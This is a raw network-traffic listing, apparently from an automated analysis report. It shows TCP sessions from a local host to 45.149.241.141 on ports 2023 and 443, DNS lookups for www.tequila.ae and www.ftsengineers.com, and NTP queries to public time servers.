                                                                                                                                                                                        Dec 9, 2024 18:49:44.602196932 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.602353096 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.602499008 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.603152037 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.603306055 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.603343010 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.604007006 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.604161024 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.604893923 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.604943991 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.605035067 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.605398893 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.605882883 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.606048107 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.606117010 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.606564999 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.606689930 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.606760979 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.607567072 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.607690096 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.607739925 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.608479023 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.608647108 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.608697891 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.609498024 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.609626055 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.610474110 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.610512972 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.610646009 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.611037016 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.611439943 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.611593962 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.611684084 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.752625942 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.752801895 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.752938986 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.753070116 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.753307104 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.753360033 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.754093885 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.754281998 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.754508972 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.755031109 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.755336046 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.755383968 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.755459070 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.756357908 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.756409883 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.756484985 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.757275105 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.757323980 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.757451057 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.758299112 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.758411884 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.758528948 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.759258032 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.759444952 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.760219097 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.760277987 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.760361910 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.761298895 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.761359930 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.761423111 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.762182951 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.762229919 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.762315989 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.763137102 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.763184071 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.763288021 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.764133930 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.764199018 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.764277935 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.765119076 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.765165091 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.765300989 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.766248941 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.766362906 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.766380072 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.767090082 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.767138958 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.767211914 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.768049002 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.768091917 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.768168926 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.769047022 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.769143105 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.769186020 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.770003080 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.770123005 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.770963907 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.771044016 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.771111012 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.771929026 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.771998882 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.772058010 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.772914886 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.773057938 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.773061037 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.773888111 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.773940086 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.774018049 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.774877071 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.775018930 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.775073051 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.775862932 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.775985956 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.776732922 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.776808023 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.776892900 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.776930094 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.777801037 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.777883053 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.777915955 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.778822899 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.778883934 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.778955936 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.779783964 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.779861927 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.779930115 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.780742884 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.780795097 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.780884027 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.781898975 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.781964064 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.782062054 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.783189058 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.783268929 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.783365011 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.784601927 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.784665108 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.784684896 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.785952091 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.786005974 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.786055088 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.787168026 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.787249088 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.787760973 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.788093090 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:44.788161039 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:44.946228027 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:45.065627098 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:45.065768957 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:45.185319901 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:45.476588964 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:45.476732969 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:45.476875067 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:45.478468895 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:45.492142916 CET498452023192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:45.596039057 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:45.597799063 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:45.611471891 CET20234984545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:45.930474997 CET49870443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:45.930494070 CET4434987045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:45.934747934 CET49870443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:45.934747934 CET49870443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:45.934773922 CET4434987045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:47.315845013 CET4434987045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:47.316018105 CET49870443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:47.320439100 CET49870443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:47.320447922 CET4434987045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:47.320683002 CET4434987045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:47.322243929 CET49870443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:47.363331079 CET4434987045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:52.109528065 CET4434987045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:52.109599113 CET4434987045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:52.109700918 CET49870443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:52.109730959 CET49870443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:52.109745979 CET4434987045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:52.109769106 CET49870443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:52.109778881 CET4434987045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:53.102886915 CET49885443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:53.102930069 CET4434988545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:53.103043079 CET49885443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:53.103176117 CET49885443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:53.103187084 CET4434988545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:54.474159956 CET4434988545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:54.474224091 CET49885443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:54.479002953 CET49885443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:54.479011059 CET4434988545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:54.479212999 CET4434988545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:54.480020046 CET49885443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:54.527339935 CET4434988545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:59.273890972 CET4434988545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:59.273956060 CET4434988545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:59.276824951 CET49885443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:59.276824951 CET49885443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:59.276909113 CET49885443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:49:59.276923895 CET4434988545.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:00.271565914 CET49903443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:00.271580935 CET4434990345.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:00.271637917 CET49903443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:00.271739960 CET49903443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:00.271752119 CET4434990345.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:01.647059917 CET4434990345.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:01.647242069 CET49903443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:01.654643059 CET49903443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:01.654659986 CET4434990345.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:01.654856920 CET4434990345.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:01.658638000 CET49903443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:01.699332952 CET4434990345.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:06.441559076 CET4434990345.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:06.441618919 CET4434990345.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:06.441679001 CET49903443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:06.441772938 CET49903443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:06.441795111 CET4434990345.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:07.479028940 CET49920443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:07.479072094 CET4434992045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:07.479135036 CET49920443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:07.479252100 CET49920443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:07.479263067 CET4434992045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:08.951770067 CET4434992045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:08.951833963 CET49920443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:08.956227064 CET49920443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:08.956237078 CET4434992045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:08.956460953 CET4434992045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:08.956952095 CET49920443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:09.003344059 CET4434992045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:13.651283979 CET4434992045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:13.651360989 CET4434992045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:13.654836893 CET49920443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:13.654901981 CET49920443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:13.654901981 CET49920443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:13.654916048 CET4434992045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:13.654925108 CET4434992045.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:14.661997080 CET49938443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:14.662025928 CET4434993845.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:14.662092924 CET49938443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:14.662169933 CET49938443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:14.662188053 CET4434993845.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:16.035531044 CET4434993845.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:16.035651922 CET49938443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:16.042787075 CET49938443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:16.042795897 CET4434993845.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:16.043071985 CET4434993845.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:16.045593023 CET49938443192.168.2.445.149.241.141
                                                                                                                                                                                        Dec 9, 2024 18:50:16.091326952 CET4434993845.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:20.861371994 CET4434993845.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:20.861454964 CET4434993845.149.241.141192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:50:20.861498117 CET49938443192.168.2.445.149.241.141

                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Dec 9, 2024 18:48:00.066951990 CET6101053192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 9, 2024 18:48:00.822352886 CET53610101.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:07.646017075 CET6046953192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 9, 2024 18:48:08.653635025 CET6046953192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 9, 2024 18:48:08.793212891 CET53604691.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:08.800582886 CET53604691.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:23.519946098 CET5280653192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 9, 2024 18:48:24.056361914 CET53528061.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:50.984781027 CET5366353192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 9, 2024 18:48:51.982186079 CET5366353192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 9, 2024 18:48:51.984911919 CET53536631.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:48:52.119791985 CET53536631.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:13.222048044 CET5841453192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 9, 2024 18:49:13.222284079 CET6270153192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 9, 2024 18:49:13.223221064 CET5193153192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 9, 2024 18:49:13.223221064 CET5752653192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 9, 2024 18:49:13.223967075 CET6206953192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 9, 2024 18:49:13.223967075 CET6275453192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 9, 2024 18:49:13.226140976 CET6533853192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 9, 2024 18:49:13.361008883 CET53627011.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:13.361546993 CET53620691.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:13.453480005 CET53584141.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:13.919181108 CET53519311.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:13.941545010 CET53653381.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:14.216785908 CET6275453192.168.2.41.1.1.1
                                                                                                                                                                                        Dec 9, 2024 18:49:14.574203014 CET53627541.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:14.574259996 CET53627541.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:14.575124025 CET65339123192.168.2.4169.229.128.134
                                                                                                                                                                                        Dec 9, 2024 18:49:14.575298071 CET65339123192.168.2.4213.239.239.164
                                                                                                                                                                                        Dec 9, 2024 18:49:14.575356007 CET65339123192.168.2.4133.243.238.244
                                                                                                                                                                                        Dec 9, 2024 18:49:14.575448990 CET65339123192.168.2.4129.250.35.250
                                                                                                                                                                                        Dec 9, 2024 18:49:14.575484991 CET65339123192.168.2.4129.134.25.123
                                                                                                                                                                                        Dec 9, 2024 18:49:14.575613022 CET65339123192.168.2.4194.58.203.20
                                                                                                                                                                                        Dec 9, 2024 18:49:15.672415972 CET12365339129.250.35.250192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:15.677573919 CET12365339129.134.25.123192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:15.751261950 CET12365339169.229.128.134192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:15.764045954 CET12365339194.58.203.20192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:15.768234015 CET12365339213.239.239.164192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:15.843715906 CET12365339133.243.238.244192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:22.991338015 CET53555211.1.1.1192.168.2.4
                                                                                                                                                                                        Dec 9, 2024 18:49:23.187877893 CET53610441.1.1.1192.168.2.4

                                                                                                                                                                                        ICMP Packets

                                                                                                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                        Dec 9, 2024 18:48:08.801088095 CET192.168.2.41.1.1.1c208(Port unreachable)Destination Unreachable
                                                                                                                                                                                        Dec 9, 2024 18:48:52.119940996 CET192.168.2.41.1.1.1c201(Port unreachable)Destination Unreachable

                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                        Dec 9, 2024 18:48:00.066951990 CET192.168.2.41.1.1.10x573dStandard query (0)www.tequila.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:07.646017075 CET192.168.2.41.1.1.10xf0c4Standard query (0)www.ftsengineers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 9, 2024 18:48:08.653635025 CET192.168.2.41.1.1.10xf0c4Standard query (0)www.ftsengineers.comA (IP address)IN (0x0001)false
